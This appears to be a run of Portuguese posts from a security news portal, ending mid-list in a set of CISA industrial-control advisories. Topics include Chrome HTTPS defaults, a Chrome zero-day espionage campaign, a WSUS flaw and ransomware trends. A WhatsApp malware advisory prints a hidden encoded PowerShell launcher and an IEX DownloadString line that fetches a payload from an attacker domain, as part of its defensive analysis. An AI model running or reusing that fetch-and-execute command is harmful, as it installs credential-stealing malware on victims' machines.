Com a nova configuração, o Chrome tentará acessar automaticamente todas as páginas via HTTPS. Caso o site não ofereça uma conexão segura, o navegador exibirá um aviso de segurança e pedirá autorização explícita do usuário para continuar a navegação.

Segundo o Google, o uso de HTTPS garante uma navegação mais segura, pois impede que invasores interceptem ou modifiquem o conteúdo acessado.

“Quando links não utilizam HTTPS, um atacante pode sequestrar a navegação e forçar o carregamento de recursos maliciosos, expondo o usuário a malware, exploração direcionada ou ataques de engenharia social”, explica a empresa.

Adoção crescente do HTTPS

De acordo com o Google, mais de 95% dos sites na web já utilizam conexões criptografadas. Nos testes realizados, o aviso de “conexão insegura” foi exibido em menos de 3% das navegações. A expectativa é que esse número seja ainda menor após a migração completa para HTTPS.

Grande parte dos acessos via HTTP, segundo a empresa, ocorre em sites que redirecionam automaticamente para versões seguras (HTTPS). O Google também informou que já entrou em contato com as organizações responsáveis por conexões inseguras e espera que todas façam a transição definitiva ao longo do próximo ano.

Migração facilitada e segurança ampliada

Uma nova permissão de acesso à rede local também deve facilitar a migração de sites que ainda servem conteúdo misto — parte seguro e parte inseguro — para o HTTPS, permitindo que eles contornem certas verificações de conteúdo misto.

Antes da ativação definitiva em 2026, o Google planeja disponibilizar o recurso por padrão em abril de 2026, com o lançamento do Chrome 147, para usuários que utilizam a proteção de Navegação Segura Avançada (Enhanced Safe Browsing).

Usuários que preferirem desativar os avisos em sites HTTP poderão fazê-lo manualmente, desabilitando a opção “Sempre usar conexões seguras”.

Para saber mais, clique aqui.

The post Chrome passará a usar HTTPS por padrão em sites públicos a partir de 2026 appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

A Kaspersky identificou uma campanha de ciberespionagem sofisticada explorando a primeira vulnerabilidade zero-day do Chrome em 2025, associada a ferramentas utilizadas pelo novo spyware do Hacking Team – agora rebatizado como Memento Labs.

A falha, rastreada como CVE-2025-2783, é descrita como uma vulnerabilidade de sandbox escape no navegador Chrome e foi explorada em ataques direcionados a setores de educação, finanças, governo, mídia e pesquisa na Rússia. Uma vulnerabilidade semelhante também afetou o Firefox, catalogada como CVE-2025-2857.

Operação ForumTroll: a campanha de espionagem

Batizada de Operação ForumTroll, a campanha utilizava e-mails de phishing disfarçados como convites para fóruns online. As mensagens continham links personalizados e de curta duração que redirecionavam as vítimas para sites maliciosos hospedando o código explorador da vulnerabilidade do Chrome.

Uma vez executado, o código validava o usuário, burlava o sandbox do navegador e injetava shellcode, o que levava à instalação de um malware loader. Para manter persistência, o código criava novas entradas no registro do Windows, sequestrando a ordem de busca de objetos COM do sistema operacional.

LeetAgent: o spyware em ação

A carga final da Operação ForumTroll era o LeetAgent, um spyware escrito em leetspeak capaz de registrar teclas digitadas, roubar arquivos e receber comandos remotos via HTTPS. O comando e controle (C&C) do malware estava hospedado na infraestrutura em nuvem da Fastly.net.

Segundo a Kaspersky, o LeetAgent tem sido utilizado desde 2022 em ataques direcionados a organizações na Rússia e Bielorrússia, e em alguns casos serviu como porta de entrada para uma ameaça mais avançada — o Dante, spyware desenvolvido pela empresa italiana Memento Labs (antiga Hacking Team).

Hacking Team, Memento Labs e o retorno do spyware “Dante”

Fundada em 2003, a Hacking Team ficou famosa por seu software de vigilância Remote Control Systems (RCS), também conhecido como Da Vinci, amplamente utilizado por governos ao redor do mundo. Após o vazamento de dados em 2015, a empresa foi adquirida em 2019 pelo grupo InTheCyber e passou a se chamar Memento Labs.

A nova ferramenta de espionagem, Dante, apresenta características semelhantes ao antigo RCS, com foco em evasão de detecção e análise forense. O spyware utiliza um orquestrador modular, que carrega componentes sob demanda e verifica o ambiente infectado. Caso não receba comandos do servidor C&C por um período determinado, ele se autodeleta do sistema, dificultando a investigação.

Relações entre as campanhas

Embora o Dante não tenha sido utilizado diretamente na Operação ForumTroll, a Kaspersky destaca semelhanças de código e técnicas entre essa operação e outras em que o spyware foi empregado. Isso inclui padrões de persistência, caminhos de arquivos, dados ocultos em fontes e código compartilhado entre o exploit, o loader e o próprio Dante.

Essas descobertas reforçam a crescente sofisticação e modularidade das campanhas de espionagem digital patrocinadas por Estados, bem como o reaproveitamento de ferramentas originalmente criadas para fins de vigilância por empresas privadas.

Para saber mais, clique aqui.

The post Zero-Day do Chrome é explorado em campanha de espionagem digital appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

A Microsoft lançou na quinta-feira (23/10) uma atualização emergencial para corrigir uma vulnerabilidade crítica no Windows Server Update Service (WSUS). Horas após a liberação do patch, pesquisadores já detectaram casos de exploração ativa da falha.

O WSUS é um componente essencial do sistema operacional Windows Server, utilizado por administradores de TI para gerenciar e distribuir centralmente atualizações e correções de produtos Microsoft em redes corporativas.

De acordo com o comunicado da empresa, a falha — identificada como CVE-2025-59287 — é uma vulnerabilidade de execução remota de código (RCE) que afeta as versões Windows Server 2012, 2016, 2019, 2022 e 2025. O problema permite que agentes mal-intencionados executem códigos arbitrários com privilégios de sistema, sem necessidade de autenticação prévia.

“Um invasor remoto e não autenticado pode enviar um evento especialmente criado que aciona uma desserialização insegura de objetos, resultando em execução remota de código”, explicou a Microsoft.

A falha foi detalhada em 18 de outubro pela empresa de segurança HawkTrace, que também publicou um exploit de prova de conceito (PoC) demonstrando a vulnerabilidade. Segundo a companhia, o código pode ser explorado para obter controle total sobre sistemas afetados.

Na sexta-feira (24), a Eye Security relatou ter identificado exploração ativa da CVE-2025-59287 em ambientes reais. Estimativas da empresa indicam que cerca de 2.500 instâncias de WSUS em todo o mundo continuam expostas. O Centro Nacional de Segurança Cibernética do governo holandês (NCSC-NL) também confirmou ter detectado atividades maliciosas explorando a vulnerabilidade.

Embora a função WSUS Server Role não esteja habilitada por padrão no Windows Server, administradores que utilizam o serviço devem aplicar imediatamente as atualizações disponibilizadas pela Microsoft. Como medida temporária, a desativação do WSUS pode mitigar o risco até a aplicação do patch definitivo.

A Microsoft classificou o caso como “exploração mais provável” em sua avaliação de risco, reforçando a urgência da correção para prevenir ataques direcionados.

Para saber mais, clique aqui.

The post Vulnerabilidade crítica no WSUS do Windows Server é explorada ativamente appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

Empresas e organizações de diversos setores — incluindo instituições governamentais e militares — estão cada vez mais adotando soluções em nuvem pela flexibilidade, escalabilidade e redução de custos que oferecem. No entanto, esse movimento também exige uma nova mentalidade sobre responsabilidade compartilhada em segurança: enquanto os provedores de serviços em nuvem (CSPs) garantem a proteção da infraestrutura, cabe às empresas que contratam o serviço zelar pela segurança das aplicações e dados hospedados.

Entre as ferramentas mais valiosas para apoiar essa responsabilidade estão os logs de fluxo em nuvem (cloud flow logs) — registros que detalham o tráfego de rede entre os endpoints hospedados na nuvem. Esses logs ajudam analistas a entender como os serviços estão sendo utilizados, identificar padrões de acesso anômalos e detectar comportamentos maliciosos ou uso indevido de recursos.

O que são os logs de fluxo em nuvem?

Os cloud flow logs reúnem informações sobre o tráfego que entra e sai de máquinas virtuais, sub-redes e grupos de segurança na nuvem. Diferentemente das soluções on-premises, que capturam o tráfego de toda a rede via sensores, na nuvem os próprios hosts ou VPCs (Virtual Private Clouds) geram os registros.

Esses logs não são projetados apenas para retenção a longo prazo, mas são essenciais para fornecer contexto histórico às atividades de rede. Eles permitem que as equipes de segurança diferenciem atividades esperadas, anômalas ou potencialmente maliciosas — aprimorando a precisão de alertas e relatórios.

A coleta contínua desses logs permite identificar três tipos principais de observações:

• Eventos — ações isoladas com implicações de segurança, sejam benignas (algo que deveria ocorrer) ou maliciosas (algo que compromete a segurança);
  
• Padrões — conjuntos de eventos que indicam comportamento recorrente, como medidas defensivas ou tentativas de ataque;
  
• Tendências — sequências de eventos que evidenciam mudanças graduais no comportamento da rede, podendo indicar tanto ajustes operacionais quanto ameaças em evolução.
  

Desafios na análise de logs em múltiplas nuvens

Cada provedor de nuvem — como AWS, Azure e Google Cloud — possui formatos e intervalos de coleta diferentes. Isso inclui variações em como o tráfego é agregado (por exemplo, registros a cada 1 ou 5 minutos), no método de amostragem (todos os pacotes ou apenas uma fração) e até na representação dos dados (endereços IP, identificadores de instância, formatos de tempo, etc.).

Essas diferenças tornam a correlação entre logs de provedores distintos um desafio técnico relevante. Sem um tratamento adequado dessas variações, a fusão dos dados pode gerar interpretações imprecisas e dificultar a visualização de comportamentos maliciosos distribuídos entre ambientes híbridos ou multi-cloud.

Três abordagens para analisar logs de fluxo em nuvem

As empresas que desejam melhorar a visibilidade e a segurança de seus ambientes em nuvem podem adotar diferentes abordagens analíticas para lidar com essas diferenças entre provedores. Abaixo, destacamos três estratégias comuns:

1. Análise separada por provedor

Nesta abordagem, os logs de cada nuvem são analisados individualmente, respeitando o formato e a estrutura específicos de cada CSP. Essa estratégia é mais simples de implementar e ideal para quem atua predominantemente em um único ambiente.

Entretanto, ela limita a visão global, já que não permite correlacionar eventos entre diferentes nuvens, o que pode ocultar padrões de ataque que atravessam múltiplas plataformas.

2. Análise separada com reconciliação de resultados

Aqui, cada provedor é analisado de forma independente, mas os resultados passam por um processo de normalização — padronizando endereços IP, formatos de tempo e outras variáveis — para permitir a comparação posterior.

Essa abordagem oferece um equilíbrio entre detalhamento e integração, possibilitando a identificação de padrões comuns em diferentes nuvens sem sacrificar totalmente a granularidade dos dados.

3. Análise comum e integrada

A abordagem mais avançada é transformar os logs de diferentes provedores em um formato unificado (como JSON ou CSV) e armazená-los em um repositório central. Dessa forma, é possível realizar análises abrangentes e automatizadas sobre todos os dados de tráfego da organização, independentemente do provedor.

Embora ofereça uma visão mais ampla e estratégica, essa opção exige maior capacidade de processamento, custos de transferência de dados e rigorosas políticas de controle de acesso.

O futuro da análise de logs em nuvem

A análise de cloud flow logs continua evoluindo, com novas ferramentas e metodologias sendo desenvolvidas para integrar dados de múltiplas fontes, como CloudTrail, S3 logs e outras telemetrias específicas dos provedores. A combinação dessas fontes permite criar um retrato mais detalhado das atividades em nuvem e fortalecer as defesas contra ameaças.

Além disso, há um movimento crescente para correlacionar logs de fluxo com Táticas, Técnicas e Procedimentos (TTPs) conhecidos, mapeando comportamentos observados em relação a catálogos como o MITRE ATT&CK — o que amplia significativamente as capacidades de detecção e resposta.

É fundamental adotar políticas inteligentes de retenção de logs. Guardar todos os dados indefinidamente pode ser caro e desnecessário, mas reter logs críticos por tempo insuficiente pode ocultar indícios de ataques sofisticados e de longa duração.

Concluindo, os logs de fluxo em nuvem são uma ferramenta essencial para fortalecer a segurança digital em ambientes modernos e distribuídos. Ao compreender as diferentes abordagens para coletar, analisar e correlacionar esses dados, as organizações podem ganhar visibilidade profunda sobre suas operações, detectar ameaças com antecedência e garantir uma postura de segurança mais proativa e eficaz.

Se a sua empresa busca centralizar a gestão da segurança da informação, monitorar vulnerabilidades e ter uma visão unificada de seus ativos e riscos, conheça a Plataforma de Cibersegurança Unificada da Clavis. Com ela, você eleva o nível de proteção do seu ambiente em nuvem e on-premises, integrando monitoramento, análise e resposta em um único painel inteligente.

Para saber mais, clique aqui.

The post Fortalecendo a segurança com logs de fluxo em nuvem appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

A privacidade de dados deixou de ser apenas um diferencial competitivo e se consolidou como um pilar essencial para a confiança e a sustentabilidade das organizações. Com a publicação da nova versão da ISO 27701:2025 nesta quarta-feira, empresas de todos os portes e setores devem se preparar para um cenário mais robusto e exigente na gestão da informação pessoal.

A grande novidade da atualização é a independência normativa em relação à ISO 27001 (Sistema de Gestão de Segurança da Informação – SGSI). O novo texto estabelece a ISO 27701 como uma norma autônoma para a implementação de sistemas de gestão da privacidade (PIMS), permitindo que organizações adotem controles de privacidade mesmo sem possuir um SGSI formalizado.

Mudanças e alinhamentos globais

A ISO 27701:2025 chega com o objetivo de aprofundar o alinhamento com legislações internacionais de proteção de dados, como a LGPD, no Brasil, e o GDPR, na Europa. Além disso, a revisão reforça o foco em controles específicos de privacidade, eliminando diretrizes não relacionadas ao tema e modernizando seu conteúdo frente às novas realidades tecnológicas e legais.

A norma também foi atualizada para garantir compatibilidade com a ISO/IEC 27001:2022, refletindo práticas contemporâneas de segurança e governança da informação.

Desafios na implementação

A adoção da nova versão traz consigo uma série de desafios para as organizações. Entre os principais estão:

• • Complexidade técnica e legal: compreender as exigências da norma e adaptá-las à legislação vigente exige conhecimento especializado em segurança da informação e direito digital.
• • Engajamento da liderança: o sucesso do PIMS depende do comprometimento da alta direção, que precisa destinar recursos e apoiar a mudança cultural.
• • Cultura organizacional: mais do que tecnologia, a privacidade demanda uma mentalidade coletiva voltada à proteção de dados.
• • Mapeamento e classificação: identificar fluxos e locais de armazenamento de dados pessoais é essencial para a conformidade.
• • Integração com sistemas existentes: alinhar o PIMS a estruturas já certificadas em ISO 27001 requer planejamento.
• • Monitoramento contínuo: manter o sistema atualizado diante de novas ameaças e exigências regulatórias é um processo permanente.

Benefícios e oportunidades

Apesar das barreiras, os benefícios da certificação ISO 27701:2025 são significativos. Além de reforçar a confiança de clientes e parceiros, a norma facilita a conformidade legal, reduz riscos de incidentes e oferece vantagem competitiva no mercado.

A atualização também impulsiona a governança de dados, otimizando processos internos e fortalecendo a base estratégica das organizações.

The post Nova versão da ISO 27701 reforça independência e exige mais maturidade das empresas em privacidade de dados appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

Um grupo de cibercrime chinês, nomeado como UAT-8099, está ativamente envolvido em campanhas de fraude de SEO (Search Engine Optimization) e no roubo de credenciais, arquivos de configuração e certificados. A principal tática identificada em uso do grupo é o comprometimento de servidores Internet Information Services (IIS) vulneráveis, com o objetivo de  instalar o malware BadIIS. As operações foram identificadas em países como Índia, Tailândia, Vietnã, Canadá e Brasil, afetando principalmente universidades, empresas de tecnologia e provedores de telecomunicações.

O UAT-8099 emprega uma cadeia de ataque sofisticada, em que primeiramente explora configurações inseguras de upload de arquivos em servidores IIS para enviar um web shell malicioso disfarçado de arquivo legítimo. 

Após o acesso, o web shell é executado para coletar informações do sistema e da rede. Em sequência, um usuário guest é criado e, posteriormente, suas permissões são elevadas a administrator para assim habilitar o Remote Desktop Protocol. Para persistência, o grupo usa o RDP em combinação das ferramentas SoftEther VPN, EasyTier e Fast Reverse Proxy para garantir acesso permanente e contornar medidas de segurança. 

Num segundo estágio de persistência, o grupo tem usado uma ferramenta compartilhada para obtenção de permissões a nível de sistema e, em seguida, realiza a instalação do malware BadIIS. O agente malicioso visa também a extração das credenciais da vítima com o Procdump, a obtenção de certificados válidos e arquivos de configuração.

Como último estágio do ataque, uma ferramenta de segurança e validação do Windows IIS é instalada pelo ator malicioso para impedir que outros invasores comprometam o servidor e adulterem sua configuração do BadIIS.

Entre as principais recomendações, estão:

• • realizar auditorias recorrentes das configurações de upload de arquivos em servidores IIS;
• • manter os servidores atualizados;
• • configuração de regras para detecção de criação de contas de usuário suspeitas, ativação de RDP via linha de comando e a presença dos artefatos e ferramentas mencionados;
• • monitoramento periódico de logs do IIS em busca de uploads de arquivos anômalos e acesso a web shells.

The post Threat Advisor – Campanha de grupo Chinês mira em empresas brasileiras appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

A Microsoft lançou um aviso que o suporte ao Windows 10 terminará em 14 de outubro de 2025. Ou seja, não será oferecido mais suporte técnico, atualizações de recursos nem correções de segurança para o Windows 10.

Apesar disso, os computadores que utilizam esta versão continuarão funcionando normalmente, mas estarão mais suscetíveis a malwares e a novas vulnerabilidades que surgirão. A Microsoft recomenda que os usuários migrem para o Windows 11, caso o dispositivo não seja compatível, a organização recomenda que o usuário se registre no programa Atualizações de Segurança Estendida do Consumidor (ESU) Windows 10, o qual oferece aos clientes uma opção segura para continuarem utilizando o Windows 10 após 14 de outubro de 2025, enquanto fazem a atualização para o Windows 11. Ou então, a solução mais rápida é adquirir um novo dispositivo que suporte o Windows 11.

Além disso, com o fim do suporte ao Windows 10, os aplicativos do Microsoft 365 também não terão mais suporte. Para manter um ambiente com suporte, a Microsoft recomenda que seja feita a atualização para o Windows 11.

É comum que atacantes explorem versões desatualizadas do Windows para facilitar ataques a ambientes corporativos. Em um caso recente, em agosto deste ano, a empresa russa Aeroflot foi atacada pelos grupos Silent Crow e Cyber Partisans. Os atacantes afirmaram que a empresa ainda utilizava diversas máquinas com Windows XP, o que, segundo eles, facilitou o ataque. Dessa forma, se faz extremamente necessário manter os sistemas operacionais atualizados para a última versão, evitando que sejam exploradas vulnerabilidades conhecidas no ambiente.

The post Threat Advisor – Fim do suporte ao Windows 10 appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

Foi identificada uma campanha de malware que está sendo divulgada pelo Whatsapp, semelhante a ocorrida em fevereiro deste ano. Desta vez, o malware está utilizando termos como “comprovante” ou “PED“, para atrair atenção das vítimas, solicitando que o arquivo seja aberto em um computador, e não pelo celular:

Em uma análise inicial foi possível identificar comportamento de infostealer no arquivo malicioso, ou seja, foco no roubo de credenciais e informações da máquina infectada. O malware está sendo distribuído em formato Zip (arquivo comprimido), e dentro da pasta compactada, existe um arquivo “.LNK” (extensão de atalhos para Windows), o qual, por fim, executa um script Powershell:

     powershell.exe -w hid -enc SQBFAFg[texto codificado em base 64]…

Este script utiliza a ação que codifica o comando de instalação de execução do próximo payload para o malware:

     IEX (New-Object Net.WebClient).DownloadString(‘https://servetenopote[.com/%5B…%5D’)

Ao analisar de forma aprofundada este comando, temos o seguinte:

• (New-Object Net.WebClient).DownloadString: função para buscar o código armazenado remotamente e salvar a string em memória;

• IEX (Invoke-Expression): executa o script que foi salvo pelo comando anterior

Durante esta fase, o arquivo malicioso baixado está sendo executado diretamente em memória, ou seja, não está salvando nenhum novo arquivo no disco da máquina, configurando uma ação fileless.

Realizamos a análise inicial da campanha e a equipe de Threat Intelligence segue investigando para identificar quais os principais riscos deste malware às vítimas e, possivelmente, à organizações que tiverem seus colaboradores comprometidos.

Recomendações gerais:

• Atualização e instalação imediata do antimalware em todas as máquinas;

• Realizar uma campanha de conscientização para colaboradores não baixarem arquivos, principalmente, de contatos não confiáveis do Whatsapp, assim como evitar a instalação de quaisquer arquivos Zip, LNK, PS1, etc;

• Criar regras de bloqueio para execução de scripts Powershell nas máquinas que não necessitam desta funcionalidade;

• Bloquear nas ferramentas os seguintes IOCs que estão ativos no momento da campanha: zapgrande[.]com, sorvetenopote[.]com, expansiveuser[.]com, ogoampoodopet[.]com e 109.176.30.141;

• Uso de MFA em todos os serviços da organização, com foco em contas bancárias e de tecnologias internas;

• É possível que o malware tenha a capacidade de comprometer o Whatsapp das máquinas infectadas, sendo assim, é necessário manter o dobro de atenção a quaisquer arquivos recebidos via Whatsapp, incluindo de contatos confiáveis.

Atualização 03/10/2025

O seguimento das análises confirmou que o malware trata-se, de fato, de um infostealer com foco em roubo de contas bancárias e de criptomoedas. Além disso, foi possível evidenciar a funcionalidade de replicação para contatos das vítimas via Whatsapp Web, e em alguns casos, utilizando o aplicativo Whatsapp do celular. O malware possui pelo menos três fases de execução mapeadas, sendo que o DLL é carregado totalmente na memória, sem criar arquivos em disco, sendo assim, fileless:

ZIP → LNK → Powershell → DLL → EXE → Bat (persistência via pasta Startup)

No momento este malware mostrou grande semelhança com o Coyote (utilizado no início do ano em campanha semelhante), mas estas amostras em específico foram nomeadas como Maverick. A figura abaixo mostra a análise estática de um executável da campanha, no qual o arquivo detecta o uso de browser e nomes de bancos específicos.

A TrendMicro compartilhou alguns dos IOCs associados a esta campanha, incluindo hashes, IPs e domínios utilizados pelos atacantes, podem ser acessados pelo link. Reforçamos as recomendações:

• • Manter o EDR atualizado, adicionando os IOCs disponibilizados;
• • Limitar o uso do Powershell a somente máquinas de usuários que necessitam dessa permissão;
• • Desabilitar o download automático de arquivos do Whatsapp;
• • Conscientizar os colaboradores sobre essa campanha de malware, orientando que não instalem arquivos ZIP chegados em conversas do Whatsapp;

EXE: https://bazaar.abuse.ch/sample/8646a46ef0988ca44edd112fac6988a6f9426c9ac1abdbe76069b71c4f1c4664/

ZIP contendo LNK: Analysis ComprovanteSantander-41674331.946233716.zip (MD5: 2C3BBA26C330D5FE779D6622A1C76A43) Malicious activity – Interactive analysis ANY.RUN

DLL: Analysis decoded_payload3.dll (MD5: 3B4E9A3F1C0EABB0B9E75AD4613A0311) Malicious activity – Interactive analysis ANY.RUN

BAT: Analysis HealthApp-17b984.bat (MD5: 2E806C74F054FF6B174B1A7D78DB6E23) No threats detected – Interactive analysis ANY.RUN

The post Threat Advisor – Nova campanha de malware sendo distribuído via Whatsapp appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

O mundo da cibersegurança vive um paradoxo em 2025. Enquanto os pedidos de sinistro em seguros cibernéticos caíram 53% no primeiro semestre — sugerindo que as empresas estão mais preparadas para prevenir ataques —, o impacto financeiro dos incidentes bem-sucedidos aumentou significativamente.

O Relatório de Riscos Cibernéticos 2025 (Midyear) revela que, quando os criminosos conseguem superar as defesas, os danos são 17% maiores em relação ao ano anterior, com ataques de ransomware ultrapassando, em média, US$ 1,18 milhão em prejuízos.

Criminosos mais sofisticados e persistentes

Depois do pico de 2024 — quando incidentes envolvendo terceiros saltaram de 0 para 21% das perdas registradas — esperava-se certa estabilização. No entanto, o que se observa é uma mudança de tática dos atacantes, que estão mais estratégicos e diversificando métodos.

Principais achados do relatório:

• • O ransomware representa 91% das perdas financeiras, embora corresponda a apenas 9,6% das ocorrências.
• • A prática da dupla extorsão já é padrão: exigir pagamento tanto pela liberação dos dados quanto pela não divulgação pública.
• • O custo médio de sinistros por ransomware subiu de US$ 705 mil em 2024 para mais de US$ 1,18 milhão em 2025.
• • 88% das perdas foram impulsionadas por ataques de engenharia social, com o phishing por IA atingindo taxa de sucesso de 54%, contra apenas 12% das tentativas tradicionais.
• • Hospitais e clínicas chegaram a receber demandas de até US$ 4 milhões em extorsão.

Três tendências críticas que estão redefinindo o risco cibernético

1. IA potencializando a engenharia social

As mensagens de phishing malfeitas ficaram no passado. Em 2025, 78% das empresas sofreram ao menos uma violação associada a ataques com IA, segundo dados da CrowdStrike.

Criminosos usam inteligência artificial para criar e-mails convincentes, falsificar vozes em ligações fraudulentas e até manipular navegadores, driblando a autenticação multifator. Somente no primeiro semestre, 1,8 bilhão de credenciais foram comprometidas — um aumento de 800% desde janeiro.

2. Evolução das táticas de ransomware com apoio da IA

O ransomware não apenas cresceu em volume e impacto, como também se tornou mais inteligente com o uso de IA.

Casos recentes mostraram que grupos de ransomware passaram a consultar apólices de seguro cibernético das vítimas para ajustar os valores exigidos. Em um ataque, os criminosos até explicitaram que pediam menos que o limite da apólice, transformando o seguro em um guia para extorsão.

Agora, com IA generativa e análise automatizada de grandes volumes de dados roubados, os criminosos conseguem:

• Priorizar alvos mais lucrativos, identificando informações financeiras, contratos e dados sensíveis rapidamente.
• Customizar mensagens de extorsão de forma convincente, utilizando linguagem adaptada ao perfil da empresa atacada.
• Simular comunicações internas (e-mails falsos de executivos ou departamentos) para aumentar a pressão psicológica durante a negociação.
• Automatizar processos de dupla extorsão, identificando quais dados, se expostos, causariam maior impacto reputacional.

Embora 79% dos clientes analisados tenham conseguido evitar o pagamento, as técnicas de pressão estão cada vez mais avançadas, explorando fraquezas humanas e organizacionais com precisão. Isso transforma o ransomware em um dos maiores desafios estratégicos da cibersegurança atual.

3. Riscos de terceiros continuam relevantes

Mesmo com queda nos números — 19% dos incidentes reportados e 15% das perdas em 2025, frente a 37% e 21% em 2024 —, a interdependência entre empresas ainda representa alto risco. Como visto nos casos da CDK Global e da Change Healthcare, vulnerabilidades em um fornecedor podem desencadear efeitos em cadeia que atingem setores inteiros.

Os grupos mais ativos em 2025

O relatório destaca alguns dos principais atores por trás dos ataques:

• Scattered Spider: grupo sofisticado que já atacou setores de varejo, aviação e seguros.
• Interlock: conhecido por usar informações de apólices de seguro para calibrar suas extorsões.
• Chaos: mais destrutivo, com versões anteriores que corrompiam arquivos de forma irreversível.

O que as empresas podem fazer

Apesar do cenário desafiador, o estudo também aponta avanços. Houve redução geral nos pedidos de sinistro e queda nos incidentes relacionados a terceiros. Porém, os ataques que passam pelas defesas estão mais caros e devastadores.

As principais recomendações incluem:

1. Proteger sua apólice de seguro cibernético como se fosse um ativo crítico.
2. Evitar pagamentos de extorsão por supressão de dados e investir em resiliência completa.
3. Adotar defesas baseadas em inteligência, capazes de monitorar dados roubados e antecipar potenciais violações.

The post Cenário de ameaças cibernéticas: Ransomware mantem-se como a principal ameaça appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

Os sistemas de supervisão, controle e aquisição de dados (Supervisory Control And Data Acquisition, conhecidos como SCADA) são fundamentais para gerenciar e monitorar operações industriais em setores essenciais como energia, água, tráfego e manufatura. Sua função estratégica os torna a espinha dorsal de infraestruturas críticas em todo o mundo.

A integração dos sistemas SCADA com novas tecnologias trouxe ganhos de eficiência e conectividade, mas também introduziu vulnerabilidades críticas. Por seu papel central em processos sensíveis, qualquer falha ou brecha de segurança pode gerar consequências graves, com prejuízos imensuráveis tanto para organizações quanto para a sociedade.

Leia o artigo completo no blog da Clavis.

The post Ameaças a sistemas SCADA: protegendo infraestruturas críticas appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

A crescente complexidade do cenário de ameaças cibernéticas tem impulsionado empresas de todos os portes a buscar soluções especializadas para garantir a proteção de seus ativos digitais.

Nesse contexto, o serviço de security consulting (ou consultoria em Segurança da Informação) surge como uma alternativa estratégica para identificar vulnerabilidades, mitigar riscos e alinhar a segurança às necessidades do negócio.

Leia o artigo completo no blog da Clavis.

The post O que é Security Consulting e como pode ajudar sua empresa? appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

O SegInfocast está de volta, e o tema da vez é tecnologia operacional. Nosso CRO, Leonardo Pinheiro, recebeu dois especialistas que estão na linha de frente da proteção de infraestruturas críticas: Jarbas Carlos (coordenador de OT da Clavis) e Ítalo Calvano (VP regional da Claroty na América Latina). Eles compartilharam insights valiosos sobre os riscos, soluções e o futuro da segurança em ambientes industriais.

O papo foi direto ao ponto: ataques cada vez mais frequentes, maturidade no Brasil, Zero Trust em OT e como a união entre Clavis e Claroty tem gerado resultados concretos na prática. Um episódio essencial para quem atua com segurança e precisa tomar decisões que realmente impactam o negócio.

The post SegInfocast #90 – OT em pauta- cibersegurança além do digital appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

A mobilidade autônoma não é mais ficção científica: cada vez mais frotas corporativas estão investindo em veículos autônomos ou semi-autônomos, com automação, sensores, comunicação veículo‑a‑veículo (V2X) e softwares de controle que substituem ou complementam funcionalidades humanas.

Com esse avanço, porém, surgem novos riscos  e a segurança cibernética passa a ser tão crítica quanto a engenharia de hardware. Empresas que operam frotas autônomas precisam entender como funcionam esses veículos, quais vulnerabilidades devem tratar e que normas regulatórias seguir, para operar de modo seguro e responsável.

Leia o artigo completo no blog da Clavis.

The post Cibersegurança para veículos autônomos em frotas corporativas appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

Em um cenário digital cada vez mais complexo, as empresas enfrentam o desafio constante de proteger seus ativos contra ameaças cibernéticas sofisticadas e persistentes. 

O Gerenciamento e Correlação de Eventos de Segurança, conhecido como SIEM (Security Information and Event Management), surge como uma solução robusta e estratégica. Essa tecnologia permite às organizações monitorar, correlacionar e responder a incidentes com maior agilidade e inteligência, oferecendo uma visão centralizada e analítica da postura de segurança da empresa.

Leia o artigo completo no Blog da Clavis.

The post Gerenciamento e Correlação de Eventos de Segurança (SIEM): o que é e suas funcionalidades appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

A Agência de Segurança Cibernética e de Infraestrutura dos EUA (CISA) publicou, em 9 de setembro de 2025, 14 novos avisos de segurança voltados para Sistemas de Controle Industrial (ICS). Esses documentos têm como objetivo alertar sobre vulnerabilidades críticas, falhas de segurança e possíveis explorações que afetam diferentes fabricantes e soluções utilizadas em ambientes industriais.

A seguir, destacamos os avisos e seus respectivos impactos:

Principais avisos publicados pela CISA

• ICSA-25-252-01 Rockwell Automation ThinManager
  Falhas no ThinManager podem permitir que atacantes obtenham acesso não autorizado a recursos críticos de visualização e gerenciamento de terminais.
• ICSA-25-252-02 ABB Cylon Aspect BMS/BAS
  Vulnerabilidades no sistema de gerenciamento predial da ABB podem expor infraestruturas de automação predial a riscos de acesso indevido e manipulação de dados.
• ICSA-25-252-03 Rockwell Automation Stratix IOS
  Problemas no sistema operacional dos switches Stratix podem abrir portas para execução remota de código e interrupção da rede industrial.
• ICSA-25-252-04 Rockwell Automation FactoryTalk Optix
  Falhas no software de visualização podem comprometer a integridade de aplicações SCADA, permitindo manipulação indevida de dados de monitoramento.
• ICSA-25-252-05 Rockwell Automation FactoryTalk Activation Manager
  Vulnerabilidades nesse gerenciador de licenciamento podem facilitar ataques de escalonamento de privilégios.
• ICSA-25-252-06 Rockwell Automation CompactLogix® 5480
  Questões de segurança nos controladores CompactLogix podem afetar a disponibilidade e a confiabilidade de processos industriais.
• ICSA-25-252-07 Rockwell Automation ControlLogix 5580
  Falhas semelhantes também foram identificadas nos controladores ControlLogix, impactando o desempenho de operações críticas.
• ICSA-25-252-08 Rockwell Automation Analytics LogixAI
  Problemas no módulo de análise baseado em IA podem permitir a extração de informações sensíveis ou adulteração de dados.
• ICSA-25-252-09 Rockwell Automation 1783-NATR
  Vulnerabilidades no dispositivo de tradução de endereços de rede podem ser exploradas para contornar controles de segmentação.
• ICSA-24-296-01 Mitsubishi Electric Iconics Digital Solutions e outros produtos (Update A)
  Atualização de aviso anterior, reforçando falhas que impactam soluções digitais e produtos da Mitsubishi Electric.
• ICSA-25-058-01 Schneider Electric Módulos de comunicação para Modicon M580 e Quantum (Update B)
  Problemas de comunicação nesses módulos podem resultar em interceptação ou manipulação de dados entre controladores industriais.
• ICSA-25-219-07 EG4 Electronics EG4 Inverters (Update B)
